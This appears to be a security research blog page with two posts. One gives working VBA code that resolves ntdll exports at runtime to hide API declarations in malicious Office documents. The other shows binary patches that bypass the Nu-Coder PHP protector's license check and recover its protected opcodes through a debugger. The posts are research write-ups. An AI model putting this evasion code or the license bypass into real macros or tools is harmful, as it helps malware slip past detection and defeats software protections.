❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayAdepts of 0xCC

VBA: resolving exports in runtime without NtQueryInformationProcess or GetProcAddress

17 March 2023 at 00:00

Dear Fellowlship, today’s homily is about bending the ungodly language of VBA to reduce traces when writing sacrilegious prayers. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

I promise my intention was to stay away from VBA for the rest of my life but sometimes the duty calls and you can not ignore it. Probably I need a therapist at this point of my life.

A long time ago in a galaxy far far away…

Months ago I released on Twitter a small snippet of code with an implementation of freshycalls technique to dynamically resolve System Service Numbers (a.k.a. syscalls numbers), so you avoid to hardcode the values in your payloads when syscalling from your maldoc. Something I did not like about my initial implementation is the fact that we can not obfuscate the NtQueryInformationProcess declaration:

Private Declare PtrSafe Function NtQueryInformationProcess Lib "NTDLL" ( _
ByVal hProcess As LongPtr, _
ByVal processInformationClass As Long, _
ByRef pProcessInformation As Any, _
ByVal uProcessInformationLength As Long, _
ByRef puReturnLength As LongPtr) As Long

Of course we can apply a light obfuscation, but is going to be sigged sooner or later. So, how can we avoid it?

Well, I only use it to get the PPEB_LDR_DATA and initiate the process of parsing the different structures until I get the export addresses. So if I can find an alternative way to get the dll base address of ntdll.dll I can avoid its usage. But VBA does not give you any tool to get this info directly (or at least I am not aware of it).

A dΓ©jΓ  vu is usually a glitch in the Matrix

My theory is that if you use an inoffensive function (e.g. NtClose) inside a sub routine it will leave traces somewhere in memory and we will able to retrieve the pointer to NtClose. Using this pointer as a reference location we can start to scan backwards to find the DLL base address.

VBA is dark and full of terrors. I am not brave enough to light a torch and walk through their dark galleys. So I choose the most cowardly approach: create small snippets of code and scan the memory with Cheat Engine. After three trials I identified a reliable way (at least in my VM) to recover the address.

Basically I get the pointer of a variable used to store the output from NtClose and I apply an offset of -0x10 to read a pointer from here. If we read the memory at this pointer we get the location of NtClose:

Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
                        
Private Declare PtrSafe Function NtClose Lib "ntdll" (ByVal ObjectHandle As LongPtr) As Long

Dim ret As Long

Function leak() As LongPtr
    ret = NtClose(-1)
    Dim funcLeak As LongPtr
    Call CopyMemory(VarPtr(funcLeak), VarPtr(ret) - 16, 8)
    leak = funcLeak
End Function

Sub sh()
    MsgBox "NtClose @ 0x" + Hex(leak())
End Sub
NtClose Address
NtClose Address

Finally I only need to start reading group of bytes backward until we find the DLL start. To do it I save 8 bytes each time in a LongPtr variable and then I compare it with 12894362189 that is 4D 5A 90 00 03 00 00 00 (the classic MZ…. header):

Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
Private Declare PtrSafe Function NtClose Lib "ntdll" (ByVal ObjectHandle As LongPtr) As Long
Dim ret As Long
Function leak() As LongPtr
    ret = NtClose(-1)
    Dim funcLeak As LongPtr
    Call CopyMemory(VarPtr(funcLeak), VarPtr(ret) - 16, 8)
    leak = funcLeak
End Function

Function findntdll() As LongPtr
    Dim check As LongPtr
    Dim leaked As LongPtr
    Dim i As LongPtr
    
    leaked = leak()
    For i = 0 To (leaked - 8)
        Call CopyMemory(VarPtr(check), leaked - i, 8)
        ' 12894362189 == 00007FF889590000  4D 5A 90 00 03 00 00 00 MZ....
        If check = 12894362189# Then
            findntdll = leaked - i
            Exit For
        End If
    Next i
End Function


Sub test()
    MsgBox "ntdll.dll at 0x" + Hex(findntdll())
End Sub
NTDLL.DLL base address
NTDLL.DLL base address

Reduce, Reuse, Recycle

If you checked my freshycalls code you can see that it can be repurposed easily to get the export addresses and construct our own GetProcAddress():

Option Explicit
Private Declare PtrSafe Function lstrlenW Lib "KERNEL32" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Function lstrlenA Lib "KERNEL32" (ByVal lpString As LongPtr) As Long

Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
Private Declare PtrSafe Function NtClose Lib "ntdll" (ByVal ObjectHandle As LongPtr) As Long



Private Type IMAGE_DOS_HEADER
     e_magic As Integer
     e_cblp As Integer
     e_cp As Integer
     e_crlc As Integer
     e_cparhdr As Integer
     e_minalloc As Integer
     e_maxalloc As Integer
     e_ss As Integer
     e_sp As Integer
     e_csum As Integer
     e_ip As Integer
     e_cs As Integer
     e_lfarlc As Integer
     e_ovno As Integer
     e_res(4 - 1) As Integer
     e_oemid As Integer
     e_oeminfo As Integer
     e_res2(10 - 1) As Integer
     e_lfanew As Long
End Type
Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    size As Long
End Type
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Type IMAGE_OPTIONAL_HEADER
        Magic As Integer
        MajorLinkerVersion As Byte
        MinorLinkerVersion As Byte
        SizeOfCode As Long
        SizeOfInitializedData As Long
        SizeOfUninitializedData As Long
        AddressOfEntryPoint As Long
        BaseOfCode As Long
        ImageBase As LongLong
        SectionAlignment As Long
        FileAlignment As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion As Integer
        MinorImageVersion As Integer
        MajorSubsystemVersion As Integer
        MinorSubsystemVersion As Integer
        Win32VersionValue As Long
        SizeOfImage As Long
        SizeOfHeaders As Long
        CheckSum As Long
        Subsystem As Integer
        DllCharacteristics As Integer
        SizeOfStackReserve As LongLong
        SizeOfStackCommit As LongLong
        SizeOfHeapReserve As LongLong
        SizeOfHeapCommit As LongLong
        LoaderFlags As Long
        NumberOfRvaAndSizes As Long
        DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type
Private Type IMAGE_NT_HEADERS
    Signature As Long                         'DWORD Signature;
    FileHeader As IMAGE_FILE_HEADER           'IMAGE_FILE_HEADER FileHeader;
    OptionalHeader As IMAGE_OPTIONAL_HEADER   'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type


Dim ret As Long


Private Function StringFromPointerW(ByVal pointerToString As LongPtr) As String
    Const BYTES_PER_CHAR As Integer = 2
    Dim tmpBuffer()    As Byte
    Dim byteCount      As Long
    ' determine size of source string in bytes
    byteCount = lstrlenW(pointerToString) * BYTES_PER_CHAR
    If byteCount > 0 Then
        'Resize the buffer as required
        ReDim tmpBuffer(0 To byteCount - 1) As Byte
        ' Copy the bytes from pointerToString to tmpBuffer
        Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
    End If
    'Straigth assigment Byte() to String possible - Both are Unicode!
    StringFromPointerW = tmpBuffer
End Function
Public Function StringFromPointerA(ByVal pointerToString As LongPtr) As String

    Dim tmpBuffer()    As Byte
    Dim byteCount      As Long
    Dim retVal         As String

    ' determine size of source string in bytes
    byteCount = lstrlenA(pointerToString)

    If byteCount > 0 Then
        ' Resize the buffer as required
        ReDim tmpBuffer(0 To byteCount - 1) As Byte

        ' Copy the bytes from pointerToString to tmpBuffer
        Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
    End If

    ' Convert (ANSI) buffer to VBA string
    retVal = StrConv(tmpBuffer, vbUnicode)

    StringFromPointerA = retVal

End Function


Function leak() As LongPtr
    ret = NtClose(-1)
    Dim funcLeak As LongPtr
    Call CopyMemory(VarPtr(funcLeak), VarPtr(ret) - 16, 8)
    leak = funcLeak
End Function

Function findntdll() As LongPtr
    Dim check As LongPtr
    Dim leaked As LongPtr
    Dim i As LongPtr
    
    leaked = leak()
    For i = 0 To (leaked - 8)
        Call CopyMemory(VarPtr(check), leaked - i, 8)
        ' 12894362189 == 00007FF889590000  4D 5A 90 00 03 00 00 00 MZ....
        If check = 12894362189# Then
            findntdll = leaked - i
            Exit For
        End If
    Next i
End Function

Sub walkExports()
    Dim dllbase As LongPtr
    Dim DosHeader As IMAGE_DOS_HEADER
    Dim pNtHeaders As LongPtr
    Dim ntHeader As IMAGE_NT_HEADERS
    Dim DataDirectory As IMAGE_DATA_DIRECTORY
    Dim IMAGE_EXPORT_DIRECTORY As LongPtr 'http://pinvoke.net/default.aspx/Structures.IMAGE_EXPORT_DIRECTORY
    Dim NumberOfFunctions As Long
    Dim NumberOfNames As Long
    Dim FunctionsPtr As LongPtr
    Dim NamesPtr As LongPtr
    Dim OrdinalsPtr As LongPtr
    Dim FunctionsOffset As Long
    Dim NamesOffset As Long
    Dim OrdinalsOffset As Long
    Dim OrdinalBase As Long
    
    ' Get ntdll.dll base
    dllbase = findntdll

    ' Get DOS Header
    Call CopyMemory(VarPtr(DosHeader), dllbase, LenB(DosHeader))
    ' Get NtHeader
    pNtHeaders = dllbase + DosHeader.e_lfanew
    Call CopyMemory(VarPtr(ntHeader), pNtHeaders, LenB(ntHeader))
    
    IMAGE_EXPORT_DIRECTORY = ntHeader.OptionalHeader.DataDirectory(0).VirtualAddress + dllbase
    
    'Number of Functions pIMAGE_EXPORT_DIRECTORY + 0x14
    Call CopyMemory(VarPtr(NumberOfFunctions), IMAGE_EXPORT_DIRECTORY + &H14, LenB(NumberOfFunctions))
    
    'Number of Names pIMAGE_EXPORT_DIRECTORY + 0x18
    Call CopyMemory(VarPtr(NumberOfNames), IMAGE_EXPORT_DIRECTORY + &H18, LenB(NumberOfNames))
    
    'AddressOfFunctions pIMAGE_EXPORT_DIRECTORY + 0x1C
    Call CopyMemory(VarPtr(FunctionsOffset), IMAGE_EXPORT_DIRECTORY + &H1C, LenB(FunctionsOffset))
    FunctionsPtr = dllbase + FunctionsOffset

    'AddressOfNames pIMAGE_EXPORT_DIRECTORY + 0x20
    Call CopyMemory(VarPtr(NamesOffset), IMAGE_EXPORT_DIRECTORY + &H20, LenB(NamesOffset))
    NamesPtr = dllbase + NamesOffset
    
    'AddressOfNameOrdianls pIMAGE_EXPORT_DIRECTORY + 0x24
    Call CopyMemory(VarPtr(OrdinalsOffset), IMAGE_EXPORT_DIRECTORY + &H24, LenB(OrdinalsOffset))
    OrdinalsPtr = dllbase + OrdinalsOffset
    
    'Ordinal Base pIMAGE_EXPORT_DIRECTORY + 0x10
    Call CopyMemory(VarPtr(OrdinalBase), IMAGE_EXPORT_DIRECTORY + &H10, LenB(OrdinalBase))
    
    Dim j As Long
    Dim i As Long
    j = 0
    For i = 0 To NumberOfNames - 1
        Dim tmpOffset As Long
        Dim tmpName As String
        Dim tmpOrd As Integer
        ' Get name
        Call CopyMemory(VarPtr(tmpOffset), NamesPtr + (LenB(tmpOffset) * i), LenB(tmpOffset))
        tmpName = StringFromPointerA(tmpOffset + dllbase)
        Cells(j + 1, 1) = tmpName
        'Get Ordinal
            Call CopyMemory(VarPtr(tmpOrd), OrdinalsPtr + (LenB(tmpOrd) * i), LenB(tmpOrd))
            Cells(j + 1, 2) = tmpOrd + OrdinalBase
        'Get Address
            tmpOffset = 0
            Call CopyMemory(VarPtr(tmpOffset), FunctionsPtr + (LenB(tmpOffset) * tmpOrd), LenB(tmpOffset))
            Cells(j + 1, 3) = Hex(tmpOffset + dllbase)
            j = j + 1
    Next i
End Sub
List of exports
List of Exports

Now I have a poor man’s GetProcAddress(). Using the DispCallFunc trick is everything I need to call arbitrary functions from DLLs that are loaded in Excell process. For example, let’s combine all to move a file from Location A to Location B:

Option Explicit
Private Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Private Declare PtrSafe Function lstrlenW Lib "kernel32" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Function lstrlenA Lib "kernel32" (ByVal lpString As LongPtr) As Long

Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal ObjectHandle As LongPtr) As Long



Private Type IMAGE_DOS_HEADER
     e_magic As Integer
     e_cblp As Integer
     e_cp As Integer
     e_crlc As Integer
     e_cparhdr As Integer
     e_minalloc As Integer
     e_maxalloc As Integer
     e_ss As Integer
     e_sp As Integer
     e_csum As Integer
     e_ip As Integer
     e_cs As Integer
     e_lfarlc As Integer
     e_ovno As Integer
     e_res(4 - 1) As Integer
     e_oemid As Integer
     e_oeminfo As Integer
     e_res2(10 - 1) As Integer
     e_lfanew As Long
End Type
Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    size As Long
End Type
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Type IMAGE_OPTIONAL_HEADER
        Magic As Integer
        MajorLinkerVersion As Byte
        MinorLinkerVersion As Byte
        SizeOfCode As Long
        SizeOfInitializedData As Long
        SizeOfUninitializedData As Long
        AddressOfEntryPoint As Long
        BaseOfCode As Long
        ImageBase As LongLong
        SectionAlignment As Long
        FileAlignment As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion As Integer
        MinorImageVersion As Integer
        MajorSubsystemVersion As Integer
        MinorSubsystemVersion As Integer
        Win32VersionValue As Long
        SizeOfImage As Long
        SizeOfHeaders As Long
        CheckSum As Long
        Subsystem As Integer
        DllCharacteristics As Integer
        SizeOfStackReserve As LongLong
        SizeOfStackCommit As LongLong
        SizeOfHeapReserve As LongLong
        SizeOfHeapCommit As LongLong
        LoaderFlags As Long
        NumberOfRvaAndSizes As Long
        DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type
Private Type IMAGE_NT_HEADERS
    Signature As Long                         'DWORD Signature;
    FileHeader As IMAGE_FILE_HEADER           'IMAGE_FILE_HEADER FileHeader;
    OptionalHeader As IMAGE_OPTIONAL_HEADER   'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type


Dim ret As Long


Private Function StringFromPointerW(ByVal pointerToString As LongPtr) As String
    Const BYTES_PER_CHAR As Integer = 2
    Dim tmpBuffer()    As Byte
    Dim byteCount      As Long
    ' determine size of source string in bytes
    byteCount = lstrlenW(pointerToString) * BYTES_PER_CHAR
    If byteCount > 0 Then
        'Resize the buffer as required
        ReDim tmpBuffer(0 To byteCount - 1) As Byte
        ' Copy the bytes from pointerToString to tmpBuffer
        Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
    End If
    'Straigth assigment Byte() to String possible - Both are Unicode!
    StringFromPointerW = tmpBuffer
End Function
Public Function StringFromPointerA(ByVal pointerToString As LongPtr) As String

    Dim tmpBuffer()    As Byte
    Dim byteCount      As Long
    Dim retVal         As String

    ' determine size of source string in bytes
    byteCount = lstrlenA(pointerToString)

    If byteCount > 0 Then
        ' Resize the buffer as required
        ReDim tmpBuffer(0 To byteCount - 1) As Byte

        ' Copy the bytes from pointerToString to tmpBuffer
        Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
    End If

    ' Convert (ANSI) buffer to VBA string
    retVal = StrConv(tmpBuffer, vbUnicode)

    StringFromPointerA = retVal

End Function

Function leak() As LongPtr
    ret = CloseHandle(-1)
    Dim funcLeak As LongPtr
    Call CopyMemory(VarPtr(funcLeak), VarPtr(ret) - 16, 8)
    leak = funcLeak
End Function

Function findntdll() As LongPtr
    Dim check As LongPtr
    Dim leaked As LongPtr
    Dim i As LongPtr
    
    leaked = leak()
    For i = 0 To (leaked - 8)
        Call CopyMemory(VarPtr(check), leaked - i, 8)
        ' 12894362189 == 00007FF889590000  4D 5A 90 00 03 00 00 00 MZ....
        If check = 12894362189# Then
            findntdll = leaked - i
            Exit For
        End If
    Next i
End Function

Private Function walkExports(dllbase As LongPtr, export As String)
    Dim DosHeader As IMAGE_DOS_HEADER
    Dim pNtHeaders As LongPtr
    Dim ntHeader As IMAGE_NT_HEADERS
    Dim DataDirectory As IMAGE_DATA_DIRECTORY
    Dim IMAGE_EXPORT_DIRECTORY As LongPtr 'http://pinvoke.net/default.aspx/Structures.IMAGE_EXPORT_DIRECTORY
    Dim NumberOfFunctions As Long
    Dim NumberOfNames As Long
    Dim FunctionsPtr As LongPtr
    Dim NamesPtr As LongPtr
    Dim OrdinalsPtr As LongPtr
    Dim FunctionsOffset As Long
    Dim NamesOffset As Long
    Dim OrdinalsOffset As Long
    Dim OrdinalBase As Long

    ' Get DOS Header
    Call CopyMemory(VarPtr(DosHeader), dllbase, LenB(DosHeader))
    ' Get NtHeader
    pNtHeaders = dllbase + DosHeader.e_lfanew
    Call CopyMemory(VarPtr(ntHeader), pNtHeaders, LenB(ntHeader))
    
    IMAGE_EXPORT_DIRECTORY = ntHeader.OptionalHeader.DataDirectory(0).VirtualAddress + dllbase
    
    'Number of Functions pIMAGE_EXPORT_DIRECTORY + 0x14
    Call CopyMemory(VarPtr(NumberOfFunctions), IMAGE_EXPORT_DIRECTORY + &H14, LenB(NumberOfFunctions))
    
    'Number of Names pIMAGE_EXPORT_DIRECTORY + 0x18
    Call CopyMemory(VarPtr(NumberOfNames), IMAGE_EXPORT_DIRECTORY + &H18, LenB(NumberOfNames))
    
    'AddressOfFunctions pIMAGE_EXPORT_DIRECTORY + 0x1C
    Call CopyMemory(VarPtr(FunctionsOffset), IMAGE_EXPORT_DIRECTORY + &H1C, LenB(FunctionsOffset))
    FunctionsPtr = dllbase + FunctionsOffset

    'AddressOfNames pIMAGE_EXPORT_DIRECTORY + 0x20
    Call CopyMemory(VarPtr(NamesOffset), IMAGE_EXPORT_DIRECTORY + &H20, LenB(NamesOffset))
    NamesPtr = dllbase + NamesOffset
    
    'AddressOfNameOrdianls pIMAGE_EXPORT_DIRECTORY + 0x24
    Call CopyMemory(VarPtr(OrdinalsOffset), IMAGE_EXPORT_DIRECTORY + &H24, LenB(OrdinalsOffset))
    OrdinalsPtr = dllbase + OrdinalsOffset
    
    'Ordinal Base pIMAGE_EXPORT_DIRECTORY + 0x10
    Call CopyMemory(VarPtr(OrdinalBase), IMAGE_EXPORT_DIRECTORY + &H10, LenB(OrdinalBase))
    
    Dim i As LongPtr
    For i = 0 To NumberOfNames - 1
        Dim tmpOffset As Long
        Dim tmpName As String
        Dim tmpOrd As Integer
        ' Get name
        Call CopyMemory(VarPtr(tmpOffset), NamesPtr + (LenB(tmpOffset) * i), LenB(tmpOffset))
        tmpName = StringFromPointerA(tmpOffset + dllbase)
        'Get Ordinal
        Call CopyMemory(VarPtr(tmpOrd), OrdinalsPtr + (LenB(tmpOrd) * i), LenB(tmpOrd))
        'Get Address
        tmpOffset = 0
        Call CopyMemory(VarPtr(tmpOffset), FunctionsPtr + (LenB(tmpOffset) * tmpOrd), LenB(tmpOffset))
        If tmpName = export Then
            walkExports = tmpOffset + dllbase
            Exit For
        End If
    Next i
End Function

Public Function stdCallA(address As LongPtr, ByVal RetType As VbVarType, ParamArray P() As Variant)
    Dim CC_STDCALL As Integer
    Dim VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
    Dim i As Long, pFunc As Long, V(), HRes As Long
    ReDim V(0)
    CC_STDCALL = 4
    
    V = P
    
    For i = 0 To UBound(V)
        If VarType(P(i)) = vbString Then P(i) = StrConv(P(i), vbFromUnicode): V(i) = StrPtr(P(i))
            VType(i) = VarType(V(i))
            VPtr(i) = VarPtr(V(i))
        Next i
  
    HRes = DispCallFunc(0, address, CC_STDCALL, RetType, i, VType(0), VPtr(0), stdCallA)
  
End Function

Sub test()
    Dim dllbase As LongPtr
    Dim lResult As Long
    Dim func01 As LongPtr 'CopyFileA
    
    'Find kernel32.dll base
    dllbase = findntdll
    func01 = walkExports(dllbase, "CopyFileA")
    MsgBox Hex(func01)
    lResult = stdCallA(func01, vbLong, "C:\Users\vagrant\tests\TestA", "C:\Users\vagrant\tests\testB", 0)
End Sub

Is not beautiful?

EoF

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

PS.: Remember to wear your NBQ suit before touching VBA

Beating an old PHP source code protector

7 March 2023 at 00:00

Dear Fellowlship, today’s homily is about our last fight against an ancient artifact called Nu-Coder, The PHP Protector. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

This research was done because a co-worker asked me for help when he was looking for vulnerabilities in a EOL product. Internet only offered to him pay-to-decrypt solutions and with so many files it was not an option. Thank you for giving me this weekend challenge!

Pilot Episode: Ocarina of Time

Something obvious to anybody who worked as developer with any interpreted language is that once you share your code, you are fucked. As the code is in plain text, it’s trivial to everyone read/understand/modify it without your consent. Well, It also could be applied to compiled files as long as you have enough coffee and time. But you understand what I mean.

Because of this reason, source code protections started to populate. Some examples in PHP ecosystem could be IonCube, Zend Guard or Nu-Coder. The latter was a popular option back in the 2000’s when the main PHP versions were PHP 4 and PHP 5, but today the project is abandoned. The last supported PHP version is 5.3, so you can imagine the rest.

As the project is not continued and the last supported version is old, I believe that sharing this article will not cause any harm and can be useful to others who want to dig in this piece from the past.

In general source code protectors in PHP works as loaders that uncompress and/or decrypt bytecode generated directly from the sources. This bytecode contains the opcodes that are interpreted by Zend Engine VM. In some cases the protector can also hook the Zend Engine in order to reinterpret the opcodes, adding functionalities or directly building it’s own VM as IonCube does.

In the case of Nu-Coder the method used to protect the code was not a problem. The biggest problem to retrieve original source code was that PHP 5.3 is too old and building stuff is a pain the ass. So, bring your ocarina of time and play the song to go to the past!

Episode 1: Get it the DeLorean, Marty

Before even starting to analyze this source protector I needed to setup an environment. And trust me, trying to compile PHP 5.3 in a modern OS is like eating a cactus.

The first thing you need to know is that by default it needs a patch to fix some issue related to XML parsing, so if you don’t patch the source code you can not compile it because the gcc will scream. Luckily someone published a patch:

curl -o php-5.3.1.patch https://mail.gnome.org/archives/xml/2012-August/txtbgxGXAvz4N.txt
cd php(...)
patch -p0 -b <../php-5.3.1.patch

Oh, you will think it is all. Now you can enjoy your shiny and new compiled PHP. Nopes. You have to modify the Makefile to add the -fcommon flag.

I know reading it seems easy. Yeah, and it does. Once you hit your head so hard for hours because you can not find why you can not compile this damn old PHP version.

Episode 2: It’s not Piracy when it’s Legacy

Once I had a working environment I needed to get a copy of Nu-Coder. Luckily you can download a trial from the last version from the official website. The problem is…

➜  nucoder ./nu-coder.bk -s test.php
Fatal error: Nu-coder license is invalid or corrupted or issued for a different product.
In order to use nucoder you need to obtain license from NuSphere Corp. (www.nusphere.com)
and save it in to "./nu-coder.lic" file

…I need a trial license. And to obtain it I have to send a mail. So it’s a dead end, as the product is discontinued.

At least PHPExpress (the loader that Nu-Coder uses) can be used without any license. And you would think β€œOh, then just reverse the code”. Well, that could be an option if I know RE. Nopes, I want to follow the path of least resistance and analyze it dynamically. And to accomplish that I need to bypass this license check.

A bit of good old patching was enough:

[0x00401850]> s 0x405526
[0x00405526]> pd 3
        β”Œβ”€< 0x00405526      0f8462040000   je 0x40598e
        β”‚   0x0040552c      488bb4247011.  mov rsi, qword [rsp + 0x1170]
        β”‚   0x00405534      4885f6         test rsi, rsi
[0x00405526]> oo+
[0x00405526]> wai jne 0x40598e
INFO: Written 6 byte(s) ( jne 0x40598e) = wx 0f8562040000 @ 0x00405526
[0x00401850]> s 0x4059a2
[0x004059a2]> pd 3
       β”Œβ”€β”€< 0x004059a2      7507           jne 0x4059ab
       β”‚β•Ž   0x004059a4      31db           xor ebx, ebx
       │└─< 0x004059a6      e9a6fbffff     jmp 0x405551
[0x004059a2]> wai je 0x4059ab
INFO: Written 2 byte(s) ( je 0x4059ab) = wx 7407 @ 0x004059a2

Well I also used a small hook (because with one of the patches you end reaching a buffer that is freed and then reused in a strdup(); you can choose between hooking strdup or β€œnoping” the free(buffer)):

➜  nucoder LD_PRELOAD=/home/vagrant/research/nucoder/test.so ./nu-coder.patched2 -s test.php
Fatal error: Nu-coder license is invalid or corrupted or issued for a different product.
In order to use nucoder you need to obtain license from NuSphere Corp. (www.nusphere.com)
and save it in to "./nu-coder.lic" file

[*] Hook: aberration remedied
-/home/vagrant/research/nucoder/test.php
0 files encoded, 0 files copied, 1 errors, 0:01 elapsed

Result (ignore the β€œ1 errors”):

➜  nucoder cat test.php.enc
<?php

//    Produced with Nu-Coder 3.1.0 Evaluation Version,
//    http://www.nusphere.com/
//    [THIS MESSAGE WILL NOT APPEAR IN THE PURCHASED VERSION OF NUCODER]

?><?php
if(!extension_loaded('Php Express')){$__['os']=strtoupper(substr(PHP_OS,0,3));$__['ver']=strtoupper(substr(PHP_VERSION,0,3));$__['ext']=($__['os']=='WIN')?'.dll':'.so';$__['nam']='phpexpress-php-'.$__['ver'].$__['ext'];$__['edr']=realpath(ini_get('extension_dir'));$__['sdr']=getcwd();if($__['os']=='WIN'){$__['idr']=str_replace('\\','/',$__['edr']);$__['sdr']=str_replace('\\','/',$__['sdr']);if((strlen($__['idr'])>2)&&($__['idr'][1]==':'))$__['idr']=substr($__['idr'],2);if((strlen($__['sdr'])>2)&&($__['sdr'][1]==':'))$__['sdr']=substr($__['sdr'],2);}else{$__['idr']=$__['edr'];}$__['rd']=str_repeat('/..',substr_count($__['idr'],'/')).$__['sdr'].'/';$__['i']=strlen($__['rd']);while(true){$__['i']=strrpos($__['rd'],'/');if($__['i']!==false){$__['rd']=substr($__['rd'],0,$__['i']);$__['lp']=$__['rd'].'/phpexpress/'.$__['nam'];if(file_exists($__['edr'].$__['lp'])){$__['nam']=$__['lp'];break;}$__['lp']=$__['rd'].'/'.$__['nam'];if(file_exists($__['edr'].$__['lp'])){$__['nam']=$__['lp'];break;}}else break;}@dl($__['nam']);if(function_exists('__pe_dl_init')){return __pe_dl_init();}else{echo('<h2>Error:</h2><br>file <i>'.__FILE__."</i> requires Php Express loader to be installed by the web site administrator.\n");exit(2);}}die('File '.__FILE__." is corrupted.\n");
?>
NUCODER&0ˎ��"6������!x

Episode 3: Hooked on a Feeling

Once I can generate encoded samples I can start to work on how to decode/decrypt Nu-Coder. Searching a bit on the official(ly dead) forum I could find this quote from the developer:

We carefully explored whole the idea of implementing our own proprietary VM for php, considered pros and cons, and finally decided not to follow it(…) If the package is encoded by Nu-Coder with license protection and license itself is not available to the engineer (intruder), he will have to crack AES128 first.(…)

So if I understand it correctly the only protection it brings is applied to the whole bytecode itself. But if it doesn’t modify the Zend Engine, then it means at some point the real opcodes must be provided to Zend Engine. My hypothesis is that we can recover the clean opcodes at zend_execute level, as it would be the logical entry point. This function receives an zend_op_array struct that contains an array with all the opcodes.

struct _zend_op_array {

/* Common elements */

zend_uchar type;

const char *function_name;

zend_class_entry *scope;

zend_uint fn_flags;

union _zend_function *prototype;

zend_uint num_args;

zend_uint required_num_args;

zend_arg_info *arg_info;

/* END of common elements */

zend_uint *refcount;

zend_op *opcodes;

zend_uint last;

zend_compiled_variable *vars;

int last_var;

zend_uint T;

zend_brk_cont_element *brk_cont_array;

int last_brk_cont;

zend_try_catch_element *try_catch_array;

int last_try_catch;

/* static variables support */

HashTable *static_variables;

zend_uint this_var;

const char *filename;

zend_uint line_start;

zend_uint line_end;

const char *doc_comment;

zend_uint doc_comment_len;

zend_uint early_binding; /* the linked list of delayed declarations */

zend_literal *literals;

int last_literal;

void **run_time_cache;

int last_cache_slot;

void *reserved[ZEND_MAX_RESERVED_RESOURCES];

};

If our hypothesis is correct, if we put a breakpoint on this function we will able to retrieve the real opcodes. Let’s see!

pwndbg> b *dlopen
Breakpoint 1 at 0x904e0
pwndbg> r -d "extension=/home/vagrant/research/nucoder/phpexpress-php-5.3.so" -d "extension=/usr/lib/php/5.3/lib/php/extensions/no-debug-non-zts-20090626/parsekit.so" ../index.php
//(...)
Breakpoint 1, ___dlopen (file=0x7ffff59c3448 "/home/vagrant/research/nucoder/phpexpress-php-5.3.so", mode=mode@entry=265) at ./dlfcn/dlopen.c:77
77	./dlfcn/dlopen.c: No such file or directory.
pwndbg> b *zend_execute
Breakpoint 2 at 0x555555815bb0: file /home/vagrant/research/nucoder/php-5.3.1/Zend/zend_vm_execute.h, line 40.
pwndbg> c
Continuing.

Breakpoint 2, execute (op_array=0x555555d66098) at /home/vagrant/research/nucoder/php-5.3.1/Zend/zend_vm_execute.h:40
40	{
pwndbg> print op_array->opcodes[0]->handler
$2 = (opcode_handler_t) 0x55555583d030 <ZEND_FETCH_R_SPEC_CONST_HANDLER>
pwndbg> print op_array->opcodes[0]->op1
$3 = {
  op_type = 1,
  u = {
    constant = {
      value = {
        lval = 93825000694400,
        dval = 4.6355709564134141e-310,
        str = {
          val = 0x555555d66280 "_SERVER",
          len = 7
        },
        ht = 0x555555d66280,
        obj = {
          handle = 1440113280,
          handlers = 0x7
        }
      },
      refcount__gc = 2,
      type = 6 '\006',
      is_ref__gc = 1 '\001'
    },
    var = 1440113280,
    opline_num = 1440113280,
    op_array = 0x555555d66280,
    jmp_addr = 0x555555d66280,
    EA = {
      var = 1440113280,
      type = 21845
    }
  }
}

pwndbg> print op_array->opcodes[1]->handler
$4 = (opcode_handler_t) 0x555555856b50 <ZEND_FETCH_DIM_R_SPEC_VAR_CONST_HANDLER>
